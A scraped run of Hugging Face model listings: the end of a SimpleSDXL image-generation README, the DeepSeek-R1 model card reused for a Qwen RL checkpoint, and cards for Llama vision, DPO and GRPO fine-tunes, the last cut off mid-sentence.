对提示词文本进行中英文切分后分别翻译再合并,适配提示词类的表达场景。 - [x] **在线和离线翻译器** 可自动安装离线翻译大模型和小尺寸的瘦模型,也可选择第三方翻译接口。离线模型需自身算力支持,第三方接口接入便捷成本低,但增加了接口依赖。用户可根据情况自主配置选>择。 - [x] **支持翻译后再编辑** 机器翻译的结果质量都不可控,存在翻译质量差导致生成内容偏差的现象。翻译后再编辑可以显性化翻译质量,提供用户再优化调整处理的空间。 - [x] **多大厂接口随机选** 选择国内大厂(百度、阿里和搜狗)的稳定接口,每次启动时随机选择,运行态相对固定。既避免对接口冲击又保持翻译的一致性。 - [ ] **私有翻译接口定制** 可以配置私有接口,方便对接OpenAI等大语言模型的翻译能力。 ### 智能抠图生成蒙板 / Intelligent cutout generation mask 具有语义识别的多种抠图算法,可自动生成蒙板,方便生成图片的组合加工。 <br> Multiple cropping algorithms with semantic recognition that can automatically generate masks, facilitating the combination processing of generated images.<br> - [x] **智能算法抠图** 可以基于u2net进行图像分割,对重绘图片进行前后景分割,人物主体分割,并生成对应蒙板进行重绘。 - [x] **语义识别抠图** 可以基于bert+Sam,在语义理解基础上识别图片内容,再进行自动分割,生成蒙板后进行重绘。 - [ ] **点击识别抠图** 点击图片某个区域,基于Sam算法对点击所在主体进行自动识别和分割,生成蒙板后进行重绘。 ### 通配符批量提示词 / Wildcard batch prompt words 支持通配符词组表达和触发展示,可随机批量生成同Seed下的一组图片。<br> Supports wildcard phrase expressions and triggering display, allowing for random batch generate a set of images under the same seed. <img width="380" align=right src="https://github.com/metercai/SimpleSDXL/assets/5652458/4b10e6de-b026-41ea-a206-77d6f9fdf1cd"> - [x] **词组语法** 支持[Words]词组,以","分割的词列表。表示在同一seed下从每个words词组抽词进行组合批量生成图片。每种组合1张图片,总量是各词组词数的乘积,以实际需要的数量为准,不受出图数量参数的限制。 - [x] **通配符组词** 用通配符定义词组,格式为:`[__wildcard__:R|Lnumber:start]` R表示随机抽,L表示按顺序抽,默认=R;number是抽取的数量,默认=1;start是在顺序抽取时从第几个开始抽,默认=1。具体语法说明见[通配符ReadMe](https://github.com/metercai/SimpleSDXL/tree/SimpleSDXL/wildcards/) - [x] **自动触发输入** 提示词框在输入'['或'_'时可自动触发通配符输入工具,可以通过界面选择追加通配符到提示词框。 - [ ] **嵌套及动态加载** 支持通配符的多级嵌套和动态加载,增强通配符的表达能力。 - [ ] **定制和推送** 支持自主定制通配符快捷方式,并推送给朋友使用。 ### 增强预置包和模型下载 / Enhanced preset and adapted for download 预置包可通过界面切换和生成,模型下载会根据IP自动选择内外源。 <br> The preset can be switched and generated through UI, and the model download will automatically select sources based on the access IP. - [x] **预置包导航** 将presets目录下的预置包配置文件生成顶部导航入口,户点击顶部预置包导航后,调取对应配置文件,重置出图环境参数和相关配置。 - [x] **生成预置包** 将当前出图环境参数打包保存为新的预置包,将预置包文件存入presets目录下,自动加入顶部导航。 - [x] **扩展预置参数** 扩展主线的预置包参数范围,补充开发者模式的参数,以及风格样式的定义和通配符的定义。支持的预置包参数见[预置包ReadMe](https://github.com/metercai/SimpleSDXL/tree/SimpleSDXL/presets/) - [x] **统一模型ID和下载** 对接模型信息库,使用以模型文件哈希为基础的统一模型MUID。可自动检测预置包出图环境的可用性,缺失模型文件可自动下载补齐。 - [x] **出图保护** 当系统环境进入出图状态时,顶部导航不可点击,禁止加载预置包冲击出图环境。 ### 图片集浏览和管理 / Finished image sets browsing and management 原生版仅能浏览当前生成的图片集,已生成图片管理非常简陋。 <br> Fooocus only can browse the current generated image set. Finished images management is very simple. - [x] **已出图片检索** 对已出图片可以按照出图日期进行检索。单天出图量过大,则根据屏幕适配分组为子目录索引,避免撑爆相册组件。 - [x] **已出图片删除** 对崩坏的已出图片可以即时删除,联动删除出图参数日志,确保图片和参数日志保持一致性。 - [x] **自动回填提示词** 在浏览已出图片集过程中,可选择自动回填图片提示词,方便提示词的对照和修改,及图片的重生。 - [x] **图片集交互优化** 已出图片集索引栏可根据状态适配,自动收起和调整,避免目录过多挤占页面空间,干扰图片生成创作。 ### 嵌参图片和提参重生 / Embeded images and extract regeneration 增强的参数管理,可即时查看可嵌入图片,也可提取参数回填界面,二次生成。 <br> Enhanced parameter management for instant viewing and embedding of images, and can also extract parameters to backfill for secondary generation.<br> - [x] **查看参数** 从出图日志文件中提取当前图片的生成参数并用浮层完整展示。图集切换过程中,浮层内容跟随切换。 - [x] **提参重生** 用当前图片的生成参数覆盖默认预置包的参数,提示词回填,可以修改参数或提示词后重新出图。 - [x] **嵌参图片** 在系统未设置统一嵌参的情况,可以制作当前图片的参数打包嵌入,并保存到专属的嵌参图片目录。嵌参图片可通过图片描述工具提取参数形成新的出图环境配置。 ### 算力云化及其他 - [x] **云化适配** 增加访问根路径启动参数,`--webroot`。当在云端服务器部署,并配置前置转发后,需要配置根路径参数,避免URL路径的混乱。 - [ ] **算力云化** 前后端分离,本机的出图算力后端可支持远程的前端出图调用,实现前端操控和出图计算的分离,让无GPU卡设备也可使用SDXL模型出图。 - [x] **主线同步** SimpleSDXL的增强代码保持良好的结构,与Fooocus主线版本保持良好的兼容性和扩展性,可以及时同步主线的新增能力和Bug修复。 ## 在线交流:qq群:938075852 如何使用,有哪些新需求,进群畅聊 <div align=center><img width="250" src="https://github.com/metercai/SimpleSDXL/assets/5652458/28f8c604-79eb-467d-956c-b9137c784194"></div> ## Star History <a href="https://star-history.com/#metercai/SimpleSDXL&Date"> <picture> <source media="(prefers-color-scheme: dark)" srcset="https://api.star-history.com/svg?repos=metercai/SimpleSDXL&type=Date&theme=dark" /> <source media="(prefers-color-scheme: light)" srcset="https://api.star-history.com/svg?repos=metercai/SimpleSDXL&type=Date" /> <img alt="Star History Chart" src="https://api.star-history.com/svg?repos=metercai/SimpleSDXL&type=Date" /> </picture> </a> ---
Jackmin108/qwen-7b-rl-step-31
Jackmin108
2025-05-30T08:13:15Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "conversational", "arxiv:2501.12948", "license:mit", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T05:04:02Z
--- license: mit library_name: transformers --- # DeepSeek-R1 <!-- markdownlint-disable first-line-h1 --> <!-- markdownlint-disable html --> <!-- markdownlint-disable no-duplicate-header --> <div align="center"> <img src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/logo.svg?raw=true" width="60%" alt="DeepSeek-V3" /> </div> <hr> <div align="center" style="line-height: 1;"> <a href="https://www.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Homepage" src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/badge.svg?raw=true" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://chat.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Chat" src="https://img.shields.io/badge/🤖%20Chat-DeepSeek%20R1-536af5?color=536af5&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://huggingface.co/deepseek-ai" target="_blank" style="margin: 2px;"> <img alt="Hugging Face" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-DeepSeek%20AI-ffc107?color=ffc107&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://discord.gg/Tc7c45Zzu5" target="_blank" style="margin: 2px;"> <img alt="Discord" src="https://img.shields.io/badge/Discord-DeepSeek%20AI-7289da?logo=discord&logoColor=white&color=7289da" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/qr.jpeg?raw=true" target="_blank" style="margin: 2px;"> <img alt="Wechat" src="https://img.shields.io/badge/WeChat-DeepSeek%20AI-brightgreen?logo=wechat&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://twitter.com/deepseek_ai" target="_blank" style="margin: 2px;"> <img alt="Twitter Follow" src="https://img.shields.io/badge/Twitter-deepseek_ai-white?logo=x&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE" style="margin: 2px;"> <img alt="License" src="https://img.shields.io/badge/License-MIT-f5de53?&color=f5de53" style="display: inline-block; vertical-align: middle;"/> </a> </div> <p align="center"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/DeepSeek_R1.pdf"><b>Paper Link</b>👁️</a> </p> ## 1. Introduction We introduce our first-generation reasoning models, DeepSeek-R1-Zero and DeepSeek-R1. DeepSeek-R1-Zero, a model trained via large-scale reinforcement learning (RL) without supervised fine-tuning (SFT) as a preliminary step, demonstrated remarkable performance on reasoning. With RL, DeepSeek-R1-Zero naturally emerged with numerous powerful and interesting reasoning behaviors. However, DeepSeek-R1-Zero encounters challenges such as endless repetition, poor readability, and language mixing. To address these issues and further enhance reasoning performance, we introduce DeepSeek-R1, which incorporates cold-start data before RL. DeepSeek-R1 achieves performance comparable to OpenAI-o1 across math, code, and reasoning tasks. To support the research community, we have open-sourced DeepSeek-R1-Zero, DeepSeek-R1, and six dense models distilled from DeepSeek-R1 based on Llama and Qwen. DeepSeek-R1-Distill-Qwen-32B outperforms OpenAI-o1-mini across various benchmarks, achieving new state-of-the-art results for dense models. **NOTE: Before running DeepSeek-R1 series models locally, we kindly recommend reviewing the [Usage Recommendation](#usage-recommendations) section.** <p align="center"> <img width="80%" src="figures/benchmark.jpg"> </p> ## 2. Model Summary --- **Post-Training: Large-Scale Reinforcement Learning on the Base Model** - We directly apply reinforcement learning (RL) to the base model without relying on supervised fine-tuning (SFT) as a preliminary step. This approach allows the model to explore chain-of-thought (CoT) for solving complex problems, resulting in the development of DeepSeek-R1-Zero. DeepSeek-R1-Zero demonstrates capabilities such as self-verification, reflection, and generating long CoTs, marking a significant milestone for the research community. Notably, it is the first open research to validate that reasoning capabilities of LLMs can be incentivized purely through RL, without the need for SFT. This breakthrough paves the way for future advancements in this area. - We introduce our pipeline to develop DeepSeek-R1. The pipeline incorporates two RL stages aimed at discovering improved reasoning patterns and aligning with human preferences, as well as two SFT stages that serve as the seed for the model's reasoning and non-reasoning capabilities. We believe the pipeline will benefit the industry by creating better models. --- **Distillation: Smaller Models Can Be Powerful Too** - We demonstrate that the reasoning patterns of larger models can be distilled into smaller models, resulting in better performance compared to the reasoning patterns discovered through RL on small models. The open source DeepSeek-R1, as well as its API, will benefit the research community to distill better smaller models in the future. - Using the reasoning data generated by DeepSeek-R1, we fine-tuned several dense models that are widely used in the research community. The evaluation results demonstrate that the distilled smaller dense models perform exceptionally well on benchmarks. We open-source distilled 1.5B, 7B, 8B, 14B, 32B, and 70B checkpoints based on Qwen2.5 and Llama3 series to the community. ## 3. Model Downloads ### DeepSeek-R1 Models <div align="center"> | **Model** | **#Total Params** | **#Activated Params** | **Context Length** | **Download** | | :------------: | :------------: | :------------: | :------------: | :------------: | | DeepSeek-R1-Zero | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Zero) | | DeepSeek-R1 | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1) | </div> DeepSeek-R1-Zero & DeepSeek-R1 are trained based on DeepSeek-V3-Base. For more details regarding the model architecture, please refer to [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repository. ### DeepSeek-R1-Distill Models <div align="center"> | **Model** | **Base Model** | **Download** | | :------------: | :------------: | :------------: | | DeepSeek-R1-Distill-Qwen-1.5B | [Qwen2.5-Math-1.5B](https://huggingface.co/Qwen/Qwen2.5-Math-1.5B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B) | | DeepSeek-R1-Distill-Qwen-7B | [Qwen2.5-Math-7B](https://huggingface.co/Qwen/Qwen2.5-Math-7B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-7B) | | DeepSeek-R1-Distill-Llama-8B | [Llama-3.1-8B](https://huggingface.co/meta-llama/Llama-3.1-8B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-8B) | | DeepSeek-R1-Distill-Qwen-14B | [Qwen2.5-14B](https://huggingface.co/Qwen/Qwen2.5-14B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-14B) | |DeepSeek-R1-Distill-Qwen-32B | [Qwen2.5-32B](https://huggingface.co/Qwen/Qwen2.5-32B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-32B) | | DeepSeek-R1-Distill-Llama-70B | [Llama-3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-70B) | </div> DeepSeek-R1-Distill models are fine-tuned based on open-source models, using samples generated by DeepSeek-R1. We slightly change their configs and tokenizers. Please use our setting to run these models. ## 4. Evaluation Results ### DeepSeek-R1-Evaluation For all our models, the maximum generation length is set to 32,768 tokens. For benchmarks requiring sampling, we use a temperature of $0.6$, a top-p value of $0.95$, and generate 64 responses per query to estimate pass@1. <div align="center"> | Category | Benchmark (Metric) | Claude-3.5-Sonnet-1022 | GPT-4o 0513 | DeepSeek V3 | OpenAI o1-mini | OpenAI o1-1217 | DeepSeek R1 | |----------|-------------------|----------------------|------------|--------------|----------------|------------|--------------| | | Architecture | - | - | MoE | - | - | MoE | | | # Activated Params | - | - | 37B | - | - | 37B | | | # Total Params | - | - | 671B | - | - | 671B | | English | MMLU (Pass@1) | 88.3 | 87.2 | 88.5 | 85.2 | **91.8** | 90.8 | | | MMLU-Redux (EM) | 88.9 | 88.0 | 89.1 | 86.7 | - | **92.9** | | | MMLU-Pro (EM) | 78.0 | 72.6 | 75.9 | 80.3 | - | **84.0** | | | DROP (3-shot F1) | 88.3 | 83.7 | 91.6 | 83.9 | 90.2 | **92.2** | | | IF-Eval (Prompt Strict) | **86.5** | 84.3 | 86.1 | 84.8 | - | 83.3 | | | GPQA-Diamond (Pass@1) | 65.0 | 49.9 | 59.1 | 60.0 | **75.7** | 71.5 | | | SimpleQA (Correct) | 28.4 | 38.2 | 24.9 | 7.0 | **47.0** | 30.1 | | | FRAMES (Acc.) | 72.5 | 80.5 | 73.3 | 76.9 | - | **82.5** | | | AlpacaEval2.0 (LC-winrate) | 52.0 | 51.1 | 70.0 | 57.8 | - | **87.6** | | | ArenaHard (GPT-4-1106) | 85.2 | 80.4 | 85.5 | 92.0 | - | **92.3** | | Code | LiveCodeBench (Pass@1-COT) | 33.8 | 34.2 | - | 53.8 | 63.4 | **65.9** | | | Codeforces (Percentile) | 20.3 | 23.6 | 58.7 | 93.4 | **96.6** | 96.3 | | | Codeforces (Rating) | 717 | 759 | 1134 | 1820 | **2061** | 2029 | | | SWE Verified (Resolved) | **50.8** | 38.8 | 42.0 | 41.6 | 48.9 | 49.2 | | | Aider-Polyglot (Acc.) | 45.3 | 16.0 | 49.6 | 32.9 | **61.7** | 53.3 | | Math | AIME 2024 (Pass@1) | 16.0 | 9.3 | 39.2 | 63.6 | 79.2 | **79.8** | | | MATH-500 (Pass@1) | 78.3 | 74.6 | 90.2 | 90.0 | 96.4 | **97.3** | | | CNMO 2024 (Pass@1) | 13.1 | 10.8 | 43.2 | 67.6 | - | **78.8** | | Chinese | CLUEWSC (EM) | 85.4 | 87.9 | 90.9 | 89.9 | - | **92.8** | | | C-Eval (EM) | 76.7 | 76.0 | 86.5 | 68.9 | - | **91.8** | | | C-SimpleQA (Correct) | 55.4 | 58.7 | **68.0** | 40.3 | - | 63.7 | </div> ### Distilled Model Evaluation <div align="center"> | Model | AIME 2024 pass@1 | AIME 2024 cons@64 | MATH-500 pass@1 | GPQA Diamond pass@1 | LiveCodeBench pass@1 | CodeForces rating | |------------------------------------------|------------------|-------------------|-----------------|----------------------|----------------------|-------------------| | GPT-4o-0513 | 9.3 | 13.4 | 74.6 | 49.9 | 32.9 | 759 | | Claude-3.5-Sonnet-1022 | 16.0 | 26.7 | 78.3 | 65.0 | 38.9 | 717 | | o1-mini | 63.6 | 80.0 | 90.0 | 60.0 | 53.8 | **1820** | | QwQ-32B-Preview | 44.0 | 60.0 | 90.6 | 54.5 | 41.9 | 1316 | | DeepSeek-R1-Distill-Qwen-1.5B | 28.9 | 52.7 | 83.9 | 33.8 | 16.9 | 954 | | DeepSeek-R1-Distill-Qwen-7B | 55.5 | 83.3 | 92.8 | 49.1 | 37.6 | 1189 | | DeepSeek-R1-Distill-Qwen-14B | 69.7 | 80.0 | 93.9 | 59.1 | 53.1 | 1481 | | DeepSeek-R1-Distill-Qwen-32B | **72.6** | 83.3 | 94.3 | 62.1 | 57.2 | 1691 | | DeepSeek-R1-Distill-Llama-8B | 50.4 | 80.0 | 89.1 | 49.0 | 39.6 | 1205 | | DeepSeek-R1-Distill-Llama-70B | 70.0 | **86.7** | **94.5** | **65.2** | **57.5** | 1633 | </div> ## 5. Chat Website & API Platform You can chat with DeepSeek-R1 on DeepSeek's official website: [chat.deepseek.com](https://chat.deepseek.com), and switch on the button "DeepThink" We also provide OpenAI-Compatible API at DeepSeek Platform: [platform.deepseek.com](https://platform.deepseek.com/) ## 6. How to Run Locally ### DeepSeek-R1 Models Please visit [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repo for more information about running DeepSeek-R1 locally. **NOTE: Hugging Face's Transformers has not been directly supported yet.** ### DeepSeek-R1-Distill Models DeepSeek-R1-Distill models can be utilized in the same manner as Qwen or Llama models. For instance, you can easily start a service using [vLLM](https://github.com/vllm-project/vllm): ```shell vllm serve deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --tensor-parallel-size 2 --max-model-len 32768 --enforce-eager ``` You can also easily start a service using [SGLang](https://github.com/sgl-project/sglang) ```bash python3 -m sglang.launch_server --model deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --trust-remote-code --tp 2 ``` ### Usage Recommendations **We recommend adhering to the following configurations when utilizing the DeepSeek-R1 series models, including benchmarking, to achieve the expected performance:** 1. Set the temperature within the range of 0.5-0.7 (0.6 is recommended) to prevent endless repetitions or incoherent outputs. 2. **Avoid adding a system prompt; all instructions should be contained within the user prompt.** 3. For mathematical problems, it is advisable to include a directive in your prompt such as: "Please reason step by step, and put your final answer within \boxed{}." 4. When evaluating model performance, it is recommended to conduct multiple tests and average the results. Additionally, we have observed that the DeepSeek-R1 series models tend to bypass thinking pattern (i.e., outputting "\<think\>\n\n\</think\>") when responding to certain queries, which can adversely affect the model's performance. **To ensure that the model engages in thorough reasoning, we recommend enforcing the model to initiate its response with "\<think\>\n" at the beginning of every output.** ## 7. License This code repository and the model weights are licensed under the [MIT License](https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE). DeepSeek-R1 series support commercial use, allow for any modifications and derivative works, including, but not limited to, distillation for training other LLMs. Please note that: - DeepSeek-R1-Distill-Qwen-1.5B, DeepSeek-R1-Distill-Qwen-7B, DeepSeek-R1-Distill-Qwen-14B and DeepSeek-R1-Distill-Qwen-32B are derived from [Qwen-2.5 series](https://github.com/QwenLM/Qwen2.5), which are originally licensed under [Apache 2.0 License](https://huggingface.co/Qwen/Qwen2.5-1.5B/blob/main/LICENSE), and now finetuned with 800k samples curated with DeepSeek-R1. - DeepSeek-R1-Distill-Llama-8B is derived from Llama3.1-8B-Base and is originally licensed under [llama3.1 license](https://huggingface.co/meta-llama/Llama-3.1-8B/blob/main/LICENSE). - DeepSeek-R1-Distill-Llama-70B is derived from Llama3.3-70B-Instruct and is originally licensed under [llama3.3 license](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct/blob/main/LICENSE). ## 8. Citation ``` @misc{deepseekai2025deepseekr1incentivizingreasoningcapability, title={DeepSeek-R1: Incentivizing Reasoning Capability in LLMs via Reinforcement Learning}, author={DeepSeek-AI}, year={2025}, eprint={2501.12948}, archivePrefix={arXiv}, primaryClass={cs.CL}, url={https://arxiv.org/abs/2501.12948}, } ``` ## 9. Contact If you have any questions, please raise an issue or contact us at [[email protected]]([email protected]).
RoyRoyRpy/test_fine-tuned-visionllama_1_epo1
RoyRoyRpy
2025-05-30T08:08:25Z
0
0
peft
[ "peft", "tensorboard", "safetensors", "trl", "sft", "generated_from_trainer", "base_model:meta-llama/Llama-3.2-11B-Vision-Instruct", "base_model:adapter:meta-llama/Llama-3.2-11B-Vision-Instruct", "license:llama3.2", "region:us" ]
null
2025-05-30T08:07:50Z
--- library_name: peft license: llama3.2 base_model: meta-llama/Llama-3.2-11B-Vision-Instruct tags: - trl - sft - generated_from_trainer model-index: - name: test_fine-tuned-visionllama_1_epo1 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # test_fine-tuned-visionllama_1_epo1 This model is a fine-tuned version of [meta-llama/Llama-3.2-11B-Vision-Instruct](https://huggingface.co/meta-llama/Llama-3.2-11B-Vision-Instruct) on an unknown dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0002 - train_batch_size: 10 - eval_batch_size: 8 - seed: 42 - gradient_accumulation_steps: 8 - total_train_batch_size: 80 - optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08 - lr_scheduler_type: constant - lr_scheduler_warmup_ratio: 0.03 - num_epochs: 1 ### Training results ### Framework versions - PEFT 0.13.0 - Transformers 4.45.1 - Pytorch 2.4.0+cu121 - Datasets 3.0.1 - Tokenizers 0.20.3
AmberYifan/Llama-3.1-8B-sft-SPIN-gpt4o-beta0.9-lr1e-7
AmberYifan
2025-05-30T08:07:50Z
0
0
transformers
[ "transformers", "safetensors", "llama", "text-generation", "generated_from_trainer", "trl", "dpo", "conversational", "arxiv:2305.18290", "base_model:AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF", "base_model:finetune:AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T07:47:30Z
--- base_model: AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF library_name: transformers model_name: Llama-3.1-8B-sft-SPIN-gpt4o-beta0.9-lr1e-7 tags: - generated_from_trainer - trl - dpo licence: license --- # Model Card for Llama-3.1-8B-sft-SPIN-gpt4o-beta0.9-lr1e-7 This model is a fine-tuned version of [AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF](https://huggingface.co/AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="AmberYifan/Llama-3.1-8B-sft-SPIN-gpt4o-beta0.9-lr1e-7", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/yifanwang/huggingface/runs/orpuijpx) This model was trained with DPO, a method introduced in [Direct Preference Optimization: Your Language Model is Secretly a Reward Model](https://huggingface.co/papers/2305.18290). ### Framework versions - TRL: 0.12.2 - Transformers: 4.46.3 - Pytorch: 2.7.0 - Datasets: 3.6.0 - Tokenizers: 0.20.3 ## Citations Cite DPO as: ```bibtex @inproceedings{rafailov2023direct, title = {{Direct Preference Optimization: Your Language Model is Secretly a Reward Model}}, author = {Rafael Rafailov and Archit Sharma and Eric Mitchell and Christopher D. Manning and Stefano Ermon and Chelsea Finn}, year = 2023, booktitle = {Advances in Neural Information Processing Systems 36: Annual Conference on Neural Information Processing Systems 2023, NeurIPS 2023, New Orleans, LA, USA, December 10 - 16, 2023}, url = {http://papers.nips.cc/paper_files/paper/2023/hash/a85b405ed65c6477a4fe8302b5e06ce7-Abstract-Conference.html}, editor = {Alice Oh and Tristan Naumann and Amir Globerson and Kate Saenko and Moritz Hardt and Sergey Levine}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
giayphuyen/gemma-3-4b-it-sphinx-chatbot
giayphuyen
2025-05-30T08:04:44Z
85
0
transformers
[ "transformers", "safetensors", "unsloth", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T03:54:26Z
--- library_name: transformers tags: - unsloth --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
sinhac332/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-pensive_foraging_platypus
sinhac332
2025-05-30T08:04:37Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "rl-swarm", "grpo", "gensyn", "I am pensive foraging platypus", "unsloth", "trl", "arxiv:2402.03300", "base_model:Gensyn/Qwen2.5-1.5B-Instruct", "base_model:finetune:Gensyn/Qwen2.5-1.5B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-05-29T19:40:20Z
--- base_model: Gensyn/Qwen2.5-1.5B-Instruct library_name: transformers model_name: Qwen2.5-1.5B-Instruct-Gensyn-Swarm-pensive_foraging_platypus tags: - generated_from_trainer - rl-swarm - grpo - gensyn - I am pensive foraging platypus - unsloth - trl licence: license --- # Model Card for Qwen2.5-1.5B-Instruct-Gensyn-Swarm-pensive_foraging_platypus This model is a fine-tuned version of [Gensyn/Qwen2.5-1.5B-Instruct](https://huggingface.co/Gensyn/Qwen2.5-1.5B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="sinhac332/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-pensive_foraging_platypus", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with GRPO, a 